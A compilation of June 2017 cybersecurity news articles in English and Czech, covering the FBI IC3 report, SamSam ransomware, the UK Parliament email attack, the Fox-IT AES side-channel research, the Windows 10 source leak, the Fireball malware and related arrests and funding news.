The annual FBI’s Internet Crime Complaint Center (IC3 was released on Thursday, it provides figures about most prevalent forms of cyber crimes today.

Online extortion, tech support scams and Business Email Compromise scams (BECs) continues to be the most costly criminal activities reported by consumers and businesses. Figures reported in the Internet Crime Complaint Center (IC3) report are related to 2016.
Business Email Compromise (BEC) and individual Email Account Compromise (EAC) scams accounted for more 25% of the total financial loss (around $360.5 million) despite they represented only a very small proportion of Internet crime reported in 2016 ( 12,005 incidents in 2016). This data confirms that both BEC and EAC are profitable activities for crooks.

BEC scams are evolving and the report includes requests for PII and age and Tax Statement (W-2) forms for employees.

“BECs may not always be associated with a request for transfer of funds. In 2016, the scam evolved to include the compromise of legitimate business email accounts and requests for Personally Identifiable
Information (PII) or Wage and Tax Statement (W-2) forms for employees.” states the report.

The three online crimes that were most commonly reported to IC3 in 2016 were non-payment and non-delivery incidents (81,029 incidents), personal data breaches (27,573), and 419/overpayment scams (25,716).


Internet Crime Complaint Center IC3 report 2015

The IC3 received 17,146 extortion-related complaints that account for over $15 million financial loss. A close look at the extortion-related complaints revealed that 2,673 complaints were ransomware-based attacks that accounted for $2.4 million losses.
This data could be just the tip of the iceberg considering that the majority of the victims don’t report the crime to law enforcement.

The Internet Crime Complaint Center (IC3) report highlights that only 15 percent of the US victims report their crimes to the authorities. For 2016, 298,728 complaints were received, with a total victim loss of $1.33 billion.

Let me suggest reading the report, it is one of the most interesting documents related to Internet crimes and is full of data. I personally believe that this edition of the report is the best one since now, it is well organized and data are aggregated in a way to be easily analyzed.


SamSam ransomware attacks increase and crooks demand higher ransom
25.6.2017 securityaffairs
Ransomware

Researchers at AlienVault observed a significant increase in the number of SamSam ransomware attacks, crooks are demanding $33,000 to the victims.
Security experts at AlienVault have observed a new string of attacks leveraging the SamSam ransomware, and this time crooks are demanding a $33,000 ransom to decrypt the files.

According to the researchers, crooks demand:

1.7 Bitcoin ($4,600) for a single machine
6 Bitcoins ($16,400) for half the machines (allowing the victim to confirm they can recover their files)
12 Bitcoins ($32,800) for all of the machines
The malware is installed on vulnerable systems through manual compromise, when the malware infects a machine it is able to spread to other computers on the network.

Experts believe the SamSam charges very high ransoms because of the effort of its operators in the operations. The FBI issued two alerts on the SamSam threat last year.

“MSIL or Samas (SAMSAM) was used to compromise the networks of multiple U.S. victims, including 2016 attacks on healthcare facilities that were running outdated versions of the JBoss content management application.” states the report published by the FBI. “SAMSAM exploits vulnerable Java-based Web servers. SAMSAM uses open-source tools to identify and compile a list of hosts reporting to the victim’s active directory. The actors then use psexec.exe to distribute the malware to each host on the network and encrypt most of the files on the system. The actors charge varying amounts in Bitcoin to provide the decryption keys to the victim.”

According to the researchers at AlienVault, SamSam attackers are using the following techniques to infect the machines:

Gain remote access through traditional attacks, such as JBoss exploits
Deploy web-shells
Connect to RDP over HTTP tunnels such as ReGeorg
Run batch scripts to deploy the ransomware over machines
samsam ransomware

SamSam was first spotted more than a year ago, it is written in C# language and once infected a machine the threat targets over 300 File types to encrypt.

Most recent variants show no changes compared to previous ones, it leverages the functions encc.myff1 and encc.EncryptFile for encryption.

Once encrypted the files. the SamSam ransomware will delete the original ones. Experts noticed the threat doesn’t clean the removed file sectors allowing users to recover their files or parts of them.

Researchers noticed a peak in the number of SamSam attack, its operators appear very active in this period. In April, systems at a New York hospital were infected with the ransomware, but the administration refused to pay the $44,000 ransom demanded by crooks.

“SamSam, which targets vulnerabilities in servers to infiltrate computer networks, is responsible for other attacks, including a major ransomware incident last year at 10-hospital Medstar Health in Maryland.” states buffalonews.com.

Experts who analyzed the transaction on the Bitcoin associated with SamSam operators noticed the attackers received $33,000 from its victims.

“The most recent attacks appear to have been successful, at least from the attacker’s point of view. The Bitcoin address associated with this week’s attacks has received $33,000,” states AlienVault.

SamSam bitcoin address


 


Důvěřivce připraví o peníze. Virová hrozba se týká i Česka

25.6.2017 Novinky/Bezpečnost Viry
Je to už pěkně starý trik, ale evidentně funguje. A tak se kyberzločinci zkouší s vyděračskými viry napálit uživatele znovu a znovu. Nejprve jim zablokují počítač, údajně kvůli tomu, že používali nějaký nelegální software nebo stahovali autorsky chráněná díla. Za odemčení pak požadují zaplacení pokuty. Podobné triky zkouší počítačoví piráti také v Česku.
Vyděračské viry kolují internetem několik posledních let. I přesto se každý měsíc nechají na výzvu o zaplacení výkupného nachytat další a další lidé. Počítačovým pirátům se tak logicky vyplatí tyto nezvané návštěvníky šířit, a tak je nasazují stále častěji.

Globální síť pro zkoumání hrozeb SophosLabs sledovala chování různých vyděračských virů, které jsou označovány souhrnným názvem ransomware, několik posledních měsíců, konkrétně od října 2016 do dubna 2017. A výsledky ukazují, že nejčastěji se vyděračské viry šíří ve Velké Británii.

Česko na nižších příčkách, ale...
Nelichotivou druhou příčku obsadila Belgie, kterou na dalších pozicích následovaly Nizozemsko a Spojené státy americkými. Nezvaní návštěvníci se nevyhýbají ani tuzemským počítačům. Česku patří s podílem menším než jedno procento 66. příčka.

Přestože riziko nakažení je v tuzemsku výrazně nižší než v případě celé řady dalších evropských států, nevyplácí se rozhodně tuto hrozbu podceňovat. Útočníci totiž v napadených strojích dovedou udělat pěnou neplechu.

Útoky vyděračských virů jsou vždy na chlup stejné. Nejprve tito záškodníci zašifrují všechna data uložená na pevném disku. Za jejich zpřístupnění pak útočníci požadují výkupné, a to klidně i několik tisíc korun.

Výkupné neplatit
Kyberzločinci se zpravidla snaží v majiteli napadeného stroje vzbudit dojem, že se ke svým souborům dostane po zaplacení pokuty.

Sluší se připomenout, že výkupné by ale lidé neměli platit, protože nemají žádné záruky, že data budou skutečně zpřístupněna. Z podobných případů, které se objevovaly v minulosti, dokonce vyplývá, že nedochází k odšifrování dat prakticky nikdy. Jediným řešením je počítač odvirovat, což však nemusí být jednoduché.

Ostražitost před vyděračskými viry připomněl v minulých týdnech škodlivý kód WannaCry. Ten napadl za pouhých pár hodin více než 300 000 počítačů v 150 zemích světa. Jen v České republice bylo přitom napadeno přes 600 stovek strojů, což bezpečnostní experti považují za úspěch – šíření tohoto ransomwaru v zahraničí bylo totiž daleko intenzivnější.


UK Parliament Cuts Email Access After Cyberattack

25.6.2017 securityweek BigBrothers
Britain's parliament shut down external access to e-mail accounts on Saturday following a cyberattack.

Parliamentary authorities described the attack as "sustained and determined", in an email sent to lawmakers and published by the Daily Telegraph.

"Earlier this morning we discovered unusual activity and evidence of an attempted cyberattack on our computer network," it read.

"Closer investigation by our team confirmed that hackers were carrying out a sustained and determined attack on all parliamentary user accounts.

"We have been working closely with the National Cyber Security Centre to identify the method of the attack and have made changes to prevent the attackers gaining access."

A House of Commons spokeswoman said that officials had taken "the necessary steps to protect our systems.

"Parliament has disabled remote access to protect the network," she said.

The threat follows reports in British media, including the Times, that hackers were selling passwords for MPs online.

The National Crime Agency said it was "aware of a possible cyber incident affecting parliament".

International Trade Minister Liam Fox told ITV News it was a "warning to everyone we need more security and better passwords"

Fox told the BBC: "We know that our public services are attacked so it is not at all surprising that there should be an attempt to hack into parliamentary emails".

A global ransomware attack last month hit hundreds of thousands of computers, including hospitals in Britain that were forced to shut down, divert emergency cases and postpone operations.

The so-called WannaCry ransomware locked access to user files and in an on-screen message demanded payment of $300 (275 euros) in the virtual currency Bitcoin in order to decrypt the files.


The CIA was aware of Putin’s order to support the Trump Presidential campaign candidacy
25.6.2017 securityaffairs BigBrothers
The CIA was aware since August that President Putin personally ordered an operation to support Donald Trump presidential race.
The intelligence shocked the White House and put US security chiefs on a top-secret crisis footing to figure out how to react.

According to the Washington Post, CIA was aware since August that President Putin personally ordered an operation to support Donald Trump in the 2016 Presidential Election.

According to the media outlet, the confidence that Democrat Hillary Clinton had won the election led the Obama administration to avoid take countermeasures.

After the shocking victory of Donald Trump, the US intelligence community had a great regreat for the missing action.

“From national security people there was a sense of immediate introspection, of, ‘Wow, did we mishandle this,'” a former administration official told the newspaper.

The Washington Post reports of a secret intelligence task force that was created by the US to firm up the information and respond to the Russian threat. The work of the experts was focused on preventing the hacking of voting systems undermining confidence in the vote tally itself.

The Obama administration opted to deliver a warning to the Russian government instead hacking back.

putin Trump

According to the Post, the US send at least four direct warnings to the Russians through different channels, including direct messages sent by Obama to Putin. The messages discouraged the Russian Government in hacking the US voting operations.

“We made the judgment that we had ample time after the election, regardless of outcome, for punitive measures,” a senior administration official told the Post.

Punitive measures range from sanctions to launching cyberattacks on Russian infrastructure, in December an executive order issued by President Obama applies sanctions on Russian military and intelligence officials. 35 Russian operatives were ejected.

The Post reports that Obama authorized a plan to implant malware in the systems of critical Russian infrastructure, but it is unclear if Trump has followed through with that.

Follow
Donald J. Trump ✔ @realDonaldTrump
Just out: The Obama Administration knew far in advance of November 8th about election meddling by Russia. Did nothing about it. WHY?
2:43 AM - 24 Jun 2017
28,233 28,233 Retweets 92,199 92,199 likes
Twitter Ads info and privacy
Trump criticized the response of the Obama administration to the alleged Russian threat.

“If he had the information, why didn’t he do something about it? He should have done something about it. But you don’t read that. It’s quite sad.” said Trump in an interview at a Fox News program.


Britský parlament se stal terčem kybernetického útoku

24.6.2017 Novinky/Bezpečnost BigBrother
Britský parlament se stal terčem kybernetického útoku. Někdo se pokusil vniknout do osobních účtů, sdělil v sobotu BBC zdroj z Dolní sněmovny. Kvůli snaze o vyřešení problému zákonodárci přišli o vzdálený přístup do své elektronické pošty, informovala agentura Reuters.
Deník The Telegraph napsal, že zákonodárci byli upozorněni na hackerský útok už v pátek a doposud nemají přístup do svých e-mailových účtů.

Mluvčí Dolní sněmovny podle BBC potvrdila, že parlament odhalil "neoprávněné pokusy o přístup k parlamentním uživatelským účtům" a že přerušení přístupu k e-mailům je důsledkem snahy o vyřešení problému.

"Pokračujeme ve vyšetřování tohoto incidentu a podnikáme další opatření na zabezpečení počítačové sítě ve spolupráci s Národním centrem kybernetické bezpečnosti," uvedla mluvčí. Cílem je podle ní ochránit účty zákonodárců i zaměstnanců parlamentu.

V květnu ochromil kybernetický útok britské nemocnice spadající pod Národní zdravotní službu (NHS).


Dva mladíci útočili na Microsoft. Nedopadlo to dobře

24.6.2017 Novinky/Bezpečnost Kriminalita
Dva mladí hackeři z Anglie se snažili zaútočit na servery amerického Microsoftu s jediným cílem – ukrást citlivá data zákazníků tohoto softwarového gigantu. Jejich snažení však bylo neúspěšné, a co hůř, oba skončili v rukách policie. Upozornil na to server The Hacker News.
Celým případem se zabývali detektivové z britské jednotky pro potírání organizovaného zločinu (SECORU). Ti mladíky zatkli ve čtvrtek, jejich identitu však zatím nezveřejnili.

Stihli je však již obvinit z trestného činu „neoprávněného přístupu“. Podobné hackerské aktivity, kdy se počítačoví piráti snaží nabourat do serverů nějakých organizací, jsou totiž v Anglii trestné. Policie již potvrdila, že mladíci ve věku 22 a 25 let útočili na servery Microsoftu.

„Jsme stále na začátku vyšetřování. Budeme nicméně usilovně spolupracovat s našimi partnery, abychom zajistili že kyberzločinci nebudou mít žádné místo, kam se schovají,“ prohlásil v souvislosti s případem detektiv Rob Bryant, který pracuje právě v jednotce SECORU.

K datům zákazníků se nedostali
Podle něj anglická policie na případu spolupracuje s Europolem, FBI a řadou dalších zahraničních bezpečnostních složek. Nechybí mezi nimi ani tým bezpečnostních expertů přímo z Microsoftu.

Útoky mladíků měly probíhat mezi lednem a březnem letošního roku. „K datům zákazníků společnosti Microsoft však mladíci nakonec přístup nezískali, což můžeme již nyní potvrdit,“ konstatoval detektiv.

Probíhající vyšetřování nicméně nasvědčuje tomu, že mladíci byli součástí nějaké nadnárodní skupiny hackerů. „Kromě dvou mladíků jsme zajistili také celou řadu počítačů a dalších zařízení. Právě to by nás mělo v případu posunout významným směrem kupředu,“ podotkl Bryant.

Soud s oběma mladíky začne nejdříve v horizontu několika týdnů.


Stealing AES-256 keys in seconds using €200 of off-the-shelf components
24.6.2017 securityaffairs Hacking

Security experts at Fox‑IT have demonstrated that is possible sniff AES-256 encryption keys from a distance of one meter (3.3 feet) with a cheap equipment.
Security experts at Fox‑IT have demonstrated that is possible to power a side-channel attack to wirelessly extract secret AES-256 encryption keys from a distance of one meter (3.3 feet).

The researchers used €200 (~US$224) worth of parts obtained from off-the-shelf electronics components to monitors a computer’s electromagnetic radiation. The entire process of sniffing the keys over the air took around five minutes, but the experts noticed that reducing the distance within 30 centimeters (11.8 inches) it is possible to extract the keys in just 50 seconds.

The experts set up an equipment composed of a simple loop antenna connected to an external amplifier and bandpass filters that were bought online and then plugged it into a radio USB stick software they paid just €20.

The size of the resulting component was contained, the device could be hidden in a jacket or laptop case.

AES-256 side channel attack

” Using improved antenna and signal processing, Fox-IT and Riscure show how to covertly recover the
encryption key from two realistic AES-256 implementations while:

Attacking at a distance of up to 1 m (30 cm in realistic conditions; “TEMPEST”)
Using minimal equipment (fits in a jacket pocket, costs less than €200) and
Needing only a few minutes (5 minutes for 1 m and 50 seconds for 30 cm” reads the research paper.
The system designed by the experts is able to record radio signals generated by the power consumption of the SmartFusion2 target system running an ARM Cortex-M3-powered chip.

By measuring the leakage between the Cortex processor and the AHB bus, the analysis of consumption was then linked to encryption process in order to extract the keys. The researchers mapped out how the power consumption related to individual bytes of information by running different encryption process on a test rig.

“We see I/O to and from the Cortex-M3, calculations for the key schedule, and the 14 encryption rounds.
Overview trace showing pattern dependent on AES algorithm. So, we can measure a signal which is related to the instantaneous power consumption of part of the chip. This is still a long way from extracting secret keys though! To extract the key, we need to observe many different encryption blocks with different inputs and attempt to model how the device leaks information.” continues the paper.

By implementing this technique, the experts were able to guess at the 256 possible values of a single byte.

“Using this approach only requires us to spend a few seconds guessing the correct value for each byte in turn (256 options per byte, for 32 bytes – so a total of 8,192 guesses),” states the paper. “In contrast, a direct brute-force attack on AES‑256 would require 2256guesses and would not complete before the end of the universe.”

The experts highlighted that the technique is more efficient in the proximity of the target system because the electromagnetic signals drop off rapidly with the distance.

The technique could be improved with more expensive equipment.

The tests were conducted in a controlled environment where possible interferences were limited respect a live environment.


SamSam Increases Ransom Demand to $33,000

24.6.2017 securityweek Ransomware
In newly observed attacks, the SamSam ransomware that has been active for more than a year is demanding a whopping $33,000 to decrypt all affected machines in a network.

SamSam isn’t distributed through automated tools such as exploit kits or spam botnets, as most ransomware families out there, but is installed on vulnerable systems through manual compromise instead.

Once a single machine in a network was breached, however, the threat can spread to other computers on the network. The ransomware’s operators are using remote desktop protocol (RDP), web shells and batch scripts to compromise networks and deploy the ransomware on every machine, AlienVault’s Chris Doman notes in a blog post.

Written in C#, the malware’s recent variants show no changes compared to previous samples, researchers say. On the compromised machines, the threat is targeting over 300 file types to encrypt, and uses the functions encc.myff1 and encc.EncryptFile for encryption, a researcher going by the name of Vallejo explains.

Recent SamSam attacks follow the same pattern as previous campaigns, albeit the demanded ransom is higher than before. The malware’s operators demand 1.7 Bitcoin (over $4,500) to decrypt a single machine, 6 Bitcoin (over $16,000) to decrypt data on half the machines, and 12 Bitcoins (around $33,000) to restore data on all of the infected machines.

“In addition, the group behind SamSam charges very high ransoms because of the amount of effort invested in their operations, which made them the subject of two FBI Alerts last year,” the researcher says.

According to AlienVault, the attacks appear to peak in waves, revealing when the ransomware’s authors are active. One notable recent SamSam incident involved a New York hospital that refused to pay the $44,000 ransom demanded after being infected with the ransomware in April.

“The most recent attacks appear to have been successful, at least from the attacker’s point of view. The Bitcoin address associated with this week’s attacks has received $33,000,” Doman reports.

After encrypting a file, SamSam deletes the original and leaves the encrypted variant instead. However, because the malware doesn’t appear to be cleaning the removed file sectors, affected users might be able to recover their files or parts of them.


32TB of Secret Windows 10 Internal Builds & Partial Source Code Leaked Online
24.6.2017 thehackernews OS
A massive archive of Microsoft's top-secret Windows 10 builds, and the source codes for private software has been reportedly leaked online, which could lead to a nasty wave of Windows 10 exploits, journalist at the Reg claims.
The Leaked files – uploaded on BetaArchive website – contains more than 32 terabytes of data, which includes many non-public Windows 10 and Windows Server 2016 builds created by Microsoft engineers for testing purpose.
Interestingly, Windows 10 internal builds include private debugging symbols defined by the engineers usually to help other in-house developers understand how some specific codes in the operating system works and what functions it calls, the Register reports.

Private debugging symbols reveal some sensitive in-depth knowledge about the operating system that could be used by exploit writers to find vulnerabilities.
Moreover, the dump also contains Microsoft's Shared Source Kit, which includes source code for Windows 10 hardware drivers, such as:
Plug-and-Play system
USB Stacks
Wi-Fi Stacks
Storage Drivers
ARM-specific OneCore kernel code
According to Microsoft's website, Shared Source Kit is available only for "qualified customers, enterprises, governments, and partners for debugging and reference purposes."
However, BetaArchive has now removed the confidential ‘Shared Source Kit’ from its servers.
“We have removed it from our FTP and listings pending further review just in case we missed something in our initial release. We currently have no plans to restore it until a full review of its contents is carried out, and it is deemed acceptable under our rules.” BetaArchive said.

The leaked files also contain Microsoft's Windows 10 Mobile Adaptation Kit, a private software toolkit created by Microsoft designed to run Windows 10 operating system on mobile devices.
So far, it’s unclear who is behind this massive leak, but it could be from one of the Microsoft OEM partners.
Stay tuned for more information.


CIA Knew in August that Putin Sought to Boost Trump: Report

24.6.2017 thehackernews BigBrothers
The CIA had top-level intelligence last August that Russian President Vladimir Putin personally ordered an operation to help Donald Trump win the US presidential race, the Washington Post reported Friday.

The intelligence shocked the White House and put US security chiefs on a top-secret crisis footing to figure out how to react.

But amid confidence that Democrat Hillary Clinton still had the election in the bag and worries over president Barack Obama himself being seen as manipulating the election, the administration delivered warnings to Moscow but left countermeasures until after the vote, the Post reported.

After Trump's shock victory, there were strong regrets among administration officials that they had shied from tough action.

"From national security people there was a sense of immediate introspection, of, 'Wow, did we mishandle this,'" a former administration official told the newspaper.

The Post said that as soon as the intelligence on Putin came in, the White House viewed it as a deep national security threat. A secret intelligence task force was created to firm up the information and come up with possible responses.

They couldn't do anything about embarrassing WikiLeaks revelations from hacked Clinton emails. The focus turned to whether Moscow could disrupt the November 8 vote itself by hacking voter registration lists or voting machines, undermining confidence in the vote tally itself.

Worried about making the situation worse, the administration put off retaliating, and instead delivered stiff warnings directly to the Russians not to go farther.

At least four direct warnings -- Obama to Putin, spy chief to spy chief, and via top diplomatic channels -- appeared to have an impact, officials told the Post. They believe that Moscow pulled back on any possible plans to sabotage US voting operations.

"We made the judgment that we had ample time after the election, regardless of outcome, for punitive measures," a senior administration official told the Post.

Options to retaliate were on the table early: more crippling sanctions on the Russian economy, leaking information that would embarrass Putin diplomatically, and launching cyberattacks on Russian infrastructure were high on the list.

But Trump's shock victory dampened the response.

Obama took modest measures at the end of December, expelling 35 Russians and adding to existing sanctions. He also, according to the Post, authorized a plan to place cyberattack implants in the systems of critical Russian infrastructure.

But it remains unclear, the Post said, whether Trump has followed through with that.

Trump on Friday questioned Obama's response to the Russian hacking crisis.

"Just out: The Obama Administration knew far in advance of November 8th about election meddling by Russia. Did nothing about it. WHY?" he posted on Twitter.

In an interview with Fox News program "Fox and Friends" that will air Sunday, Trump groused that Obama's response did not get more media coverage.

"The CIA gave him information on Russia a long time before they even -- before the election. And I hardly see it. It's an amazing thing," Trump said in an excerpt released by the program Friday evening.

"If he had the information, why didn't he do something about it? He should have done something about it. But you don't read that. It's quite sad."


GreatHorn Secures $6.3 Million to Combat Spear-Phishing Attacks

23.6.2017 securityweek  Phishing
Belmont, Mass-based start-up GreatHorn announced Wednesday completion of a $6.3 million Series A funding round led by Techstars Venture Capital Fund and .406 Ventures.

The firm, one of Gartner's 'cool cloud vendors', is bringing machine-learning technology to the continuing threat and problem of targeted spear phishing. Spear-phishing, and the related Business E-mail Compromise (BEC) scam, are two of today's most pernicious threats -- the former is the first stage of the majority of successful breaches; and the latter, according to the FBI in May 2016, is responsible for losses "now totaling over $3 billion."

Both threats have proved resilient against traditional defenses because of their use of finely tuned and targeted, narrow-band social engineering. Effectively, each threat is new and unique, probably contains no payload to analyze, and is delivered before it can be recognized and blocked. The same problem exists for malware: new versions are delivered and get through signature-based anti-virus defenses before detection is added to the defense.

The solution against malware has been a shift of emphasis towards the recognition of malware behavior, using machine-learning to understand and detect that behavior. Conceptually, GreatHorn takes a similar approach to spear-phishing and BEC. It monitors email across the cloud both in metadata and content. It builds a behavioral graph that can detect anomalies in email behavior.

"We're not looking for a single smoking gun, we do not rely on any single indicator," CEO Kevin O'Brien told SecurityWeek. "What we do is plug into cloud email systems like Google and O365, and we look at all of the mail that gets sent and received. Then we build a social graph -- we start to understand how, for example, a CFO receives messages from the CEO, what those messages look like, how often they come, are they a bi-directional flow or received only. And we look at all the mechanisms of authentication buried in the metadata. We develop a fingerprint that can be coupled with the social graph.

"When you start to do that, not just for a single company but globally for hundreds of thousands of mailboxes every minute you start to see patterns of how email communication works. From there we think of it in terms of anomaly detection, and we can begin to identify anomalous messages -- things that could be spear-phishing or BEC attempts. We're not looking for things that might match an out of date blacklist, we have a unique lens on how individuals inside of a company, or inside of an industry sector, or even around the world, send mail."

It is this new application of machine-learning on big data to detect the anomalies in e-mail that could detect and prevent spear-phishing that has attracted the investors. "Advanced and targeted social engineering threats represent one of the most pernicious and dangerous challenges to organizations in both the public and private sector," explained Techstars Ventures Partner Ari Newman. "GreatHorn brings fresh thinking and a cloud-native, intelligent platform that can protect these organizations. We've been thrilled with the progress and execution GreatHorn has shown over the last few years and are excited to step up our investment in the company."

"GreatHorn," added .406 Ventures Partner Greg Dracon, "is at the forefront of next-generation cybersecurity, understanding that changing human behavior is difficult and that security awareness training is not nearly enough for employees faced with sophisticated phishing techniques that look real from presumably trusted contacts." Both Newman and Dracon are joining GreatHorn's board of directors.

Existing investors including ff Venture Capital, SoftTech Ventures and RRE Ventures also participated in the funding round.


Kantara Initiative Releases Consent Receipt Form for GDPR

23.6.2017 securityweek  Privacy
With less than one year before GDPR kicks in, the newswaves have been flooded in recent months with new surveys showing how ill-prepared business still remains. But while there is much news, there has been little in the way of practical technology solutions. The Kantara Initiative released one on Tuesday: a global consent receipt specification that meets GDPR requirements.

'Consent' is one of the big and far-reaching elements of GDPR. Failure to abide by the new consent requirements means failure to comply with GDPR, and potential liability for the regulation's stringent sanctions -- it is no longer simply a matter of preventing breaches.

Consent now must be informed and explicit. It means that in the event of a dispute over the use of personal information, or the transfer of personal data either between applications or to third parties, business will need to be able to prove that consent had indeed been given. Online tick-boxes and assumed consent will not suffice.

Kantara's Consent Receipt 1.0 (CR 1.0) (PDF) allows businesses dealing with EU-based companies to demonstrate they meet the notice requirements of GDPR scheduled to be enforced on May 25, 2018. The specification is available free for download. Its purpose is to decrease the reliance on privacy policies and enhance the ability for people to share and control personal information.

Related: GDPR Industry Roundup - One Year to Go

The Kantara Initiative is a non-profit alliance of some of the world's companies involved with digital identities. It connects a global, open, and transparent community that includes CA Technologies, Experian, ForgeRock, Digi.me, Internet Society, Nomura Research Institute and SecureKey.

The consent receipt works both ways. While the business can prove that consent was genuinely given, the user can also define exactly what consent is withdrawn; either on its own or in conjunction with the so-called right-to-be-forgotten'.

"Until CR 1.0," explains Colin Wallis, executive director at the Kantara Initiative, "there was no effective privacy standard or requirement for recording consent in a common format and providing people with a receipt they can reuse for data rights. Individuals could not track their consents or monitor how their information was processed or know who to hold accountable in the event of a breach of their privacy. CR 1.0 changes the game," he added. "A consent receipt promises to put the power back into the hands of the individual and, together with its supporting API -- the consent receipt generator -- is an innovative mechanism for businesses to comply with upcoming GDPR requirements. For the first time individuals and organizations will be able to maintain and manage permissions for personal data."

There is, however, the proverbial elephant in the room. The companies that will be most affected by GDPR and consent are the big tech companies like Google, Facebook and Microsoft. It is unknown at this stage whether Europe will have the political will to fully enforce GDPR against the big American giants. If these companies prevaricate over full compliance without redress from Europe, why should other companies worry about something as esoteric as a consent receipt?

SecurityWeek asked the Kantara developers if this was a concern. It is not. "Markets evolve, technologies emerge and people get tired of the same old same old," said one of the consent receipt developers. "Given the rising anger amongst the people that pay for ads on these platforms, and the increasing creepiness of surveillance capitalism, it's not an unreasonable bet to say that both Google and Facebook's days as kings of their hills are numbered. They won't diminish as quickly as Friendster but they will diminish. Both the tech and business press are typically ahistorical and short sighted, so it's not surprising that they are continually surprised by new developments."

His point is that GDPR reflects an almost worldwide shift in attitudes, with consumers becoming more aware of and cynical towards the use of their personal data within surveillance capitalism. "Despite cartel-like market domination in their areas, the actual switching costs for users (and customers) of Facebook and Google are very low."

However, by embracing the new reality of user-centric regulations, companies that rely on user information will better maintain and indeed increase their user numbers. The same basic principles apply to all businesses. Engaging and conforming with user-centric regulations will only strengthen the relationship between business and customers. Kantara's consent receipt form provides compliance with GDPR, and reassurance to customers.


Microsoft Downplays Impact of "Fireball" Malware

23.6.2017 securityweek  Virus
The Fireball malware detailed early this month might not have have had as much impact as originally reported, Microsoft claims.

Operated by Chinese digital marketing agency Rafotech, the Fireball malware was designed to take over targeted browsers, spy on victims, and run code on compromised machines. Because of that, the threat can be used to download additional malware onto an infected machine, and also allows its operators to manipulate the victim’s Internet traffic to generate ad revenue.

The malware was discovered by security firm Check Point, which suggested at the time that over 250 million computers worldwide had been affected by the threat. Furthermore, the company also said that Fireball impacted 20% of all corporate networks out there.

According to Microsoft, however, the initial report on Fireball might have exaggerated the malware’s reach. The company also claims that it has been tracking Fireball since 2015, meaning that it isn’t as new as previously suggested.

“Our teams knew differently because we have been tracking this threat since 2015. While the threat is real, the reported magnitude of its reach might have been overblown,” Hamish O’Dea, Windows Defender Research, says.

The researcher reveals that the initial Fireball infection comes through software bundling, as the malware is installed alongside other programs users download via their browsers, often “apps or media of dubious origin (pirated apps, games, music or video, cracks or keygens, etc.).”

The Fireball suite also includes clean programs, and the malware abuses these apps as host processes to load malicious code and evade behavior-based detection. The suite’s components were designed to “either persist on an infected machine, monetize via advertising, or hijack browser search and home page settings,” O’Dea says.

Microsoft’s researcher confirms the malware was designed to hijack the browser’s home page and default search settings, thus loading a search page that earns malware creators revenue from users’ searches.

The tech giant reveals that the most prevalent malware families in the Fireball suite are SupTab, Xadupi, Ghokswa, and Sasquor.

According to Microsoft, Check Point erroneously estimated Fireball’s spread because it relied on the number of visits to the search pages (some visits came from clean machines) and on analyzing Alexa ranking data.

“The estimates were made from analyzing Alexa ranking data, which are estimates of visitor numbers based on a small percentage of Internet users. Alexa’s estimates are based on normal web browsing. They are not the kind of traffic produced by malware infections, like the Fireball threats, which only target Google Chrome and Mozilla Firefox. The Alexa traffic estimates for the Fireball domains, for example, differ from Alexa competitor SimilarWeb,” O’Dea points out.

Based on “intelligence gathered from 300 million Windows Defender AV clients since 2015, plus monthly scans by the MSRT on over 500 million machines since October 2016,” Microsoft determines that the scale of the Fireball threat over time was much lower than Check Point suggested.

Specifically, the company says Malicious Software Removal Tool (MSRT) encountered SupTab 4,920,456 times, Xadupi 3,373,023 times, Ghokswa 1,503,968 times, and Saquor 1,287,297 times.

Microsoft added the Fireball family of malware to its MSRT over the course of three releases in September 2016, October 2016, and February 2017. Thus, the number of machines that MSRT cleaned for the four most prevalent Fireball families suggests that only around 11 million computers were infected.

“We’ve reached out to Check Point and requested to take a closer look at their data,” O’Dea notes.

SecurityWeek has contaced Check Point for a comment but has not heard back at the time of publishing. We’ll update the article as soon as a reply arrives.


UK politicians’ login credentials up for sale in the dark web
23.6.2017 securityaffairs Crime

Russians hackers are offering for sale on the dark web login credentials of thousands of top UK politicians, top officials, and diplomats.
According to The Times, Russians hackers are selling on the dark web login credentials of thousands of top UK politicians, top officials, and diplomats.

Journalists at the British newspaper have found two huge lists of stolen credentials that were available for sale on Russian-speaking hacking sites. The huge trove of credentials included the log-in details of 1,000 British MPs and parliamentary staff, 7,000 police employees and over 1,000 Foreign Office officials.

“Passwords belonging to British cabinet ministers, ambassadors, and senior police officers have been traded online by Russian hackers, an investigation by The Times has found.” reads The Times. “Two huge lists of stolen data reveal private log-in details of 1,000 British MPs and parliamentary staff, 7,000 police employees and more than 1,000 Foreign Office officials, an analysis shows — including the department’s own head of IT.”

uk politicians data leak

According to experts that analyzed the lists speculate they are composed of old credentials. The list appears as composed starting from data coming from old data breaches such as LinkedIn and MySpace.

“They include passwords used by the former ambassador to Israel and the director-general of the Department for Exiting the European Union.” continues The Times.

The main risk is related to the possibility that victim used the same credentials to access other sensitive systems and networks.

It is interesting to note that despite official guidance advising the use of strong passwords, the data leak shows that many politicians were using easy to guess passwords.

“Peter Jones, the Foreign Office’s chief operating officer, who has overall responsibility for IT, appears to have used a highly insecure password which occurred more than 3,700 times in one of the lists.” continues the newspaper.

Many victims re-used insecure passwords on multiple websites. such as the former Cabinet Office minister Brooks Newmark,


Two British Men Arrested For Hacking Microsoft
23.6.2017 thehackernews  Crime
British police have arrested two men in the UK conspiring to hack into the computer networks of US tech giant Microsoft with plans to steal customers’ data from the software giant.
The suspects — 22-year-old from Sleaford and a 25-year-old from Bracknell — were arrested by the detectives from the Britain's South East Regional Organised Crime Unit (SEROCU) Thursday morning (22 June 2017).
The UK authorities arrested them from their home in Lincolnshire and Bracknell and seized a number of devices after searching their home.
While it is still unclear what systems were targeted, SEROCU believes the suspects are part of a larger international group that involved breaking into the Microsoft's network between January 2017 and March 2017 to scoop up the customer information.
"This group is spread around the world and therefore the investigation is being coordinated with our various partners," Rob Bryant, detective sergeant SEROCU's Cyber Crime Unit said while announcing the arrest. "We have made two arrests in the UK this morning and have seized a number of devices."
"We're still in the early stages of this investigation and will work with our partners to ensure that cyber criminals have no place to hide. It's too early to speculate on what information the group has accessed, however, after speaking with Microsoft we can confirm they didn't gain access to customer information."
Both the suspects, whose identities have not yet revealed by the police, are currently in custody and have been charged under the Britain's Computer Misuse Act for conspiracy to gain "unauthorised access" to protected computers belonging to Microsoft.
In response to the arrests, Tom Burt, Microsoft VP and deputy general counsel of the Digital Crimes Unit released a statement to BBC, saying:
"Today's action by authorities in the UK represents an important step...Stronger internet security depends on the ability to identify and prosecute cybercriminals. This requires not only a strong technical capability but the willingness to acknowledge issues publicly and refer them to law enforcement."
